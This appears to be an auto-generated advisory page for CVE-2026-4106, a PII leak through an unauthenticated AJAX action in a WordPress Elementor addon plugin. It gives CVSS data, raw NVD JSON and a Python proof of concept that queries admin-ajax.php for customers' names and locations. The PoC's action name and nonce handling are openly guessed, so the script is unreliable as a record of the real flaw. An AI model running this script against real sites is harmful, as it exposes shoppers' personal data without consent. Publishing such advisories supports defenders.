Security Vulnerability Report
CVE-2026-4106 CVSS 5.3 MEDIUM

CVE-2026-4106

Published: 2026-04-23 07:16:41
Last Modified: 2026-04-23 18:16:30

Description

The HT Mega Addons for Elementor WordPress plugin before 3.0.7 contains an unauthenticated AJAX action returning some PII (such as full name, city, state and country) of customers who placed orders in the last 7 days

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HT Mega Addons for Elementor < 3.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (replace with actual target)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# The specific action name may vary based on plugin version or configuration.
# This is a representative example of the exploit payload.
payload = {
    "action": "ht_mega_get_recent_orders",  # Example action name, verify in source code
    "security": "",  # If nonce is required, this might be empty or bypassed
}

try:
    # Sending unauthenticated POST request
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
        # Check if PII data is present in the response
        if "full_name" in response.text or "city" in response.text:
            print("[!] Potential PII data leaked!")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-4106",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-23T07:16:41.210",
    "lastModified": "2026-04-23T18:16:30.063",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The HT Mega Addons for Elementor WordPress plugin before 3.0.7 contains an unauthenticated AJAX action returning some PII (such as full name, city, state and country) of customers who placed orders in the last 7 days"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/",
        "source": "[email protected]"
      }
    ]
  }
}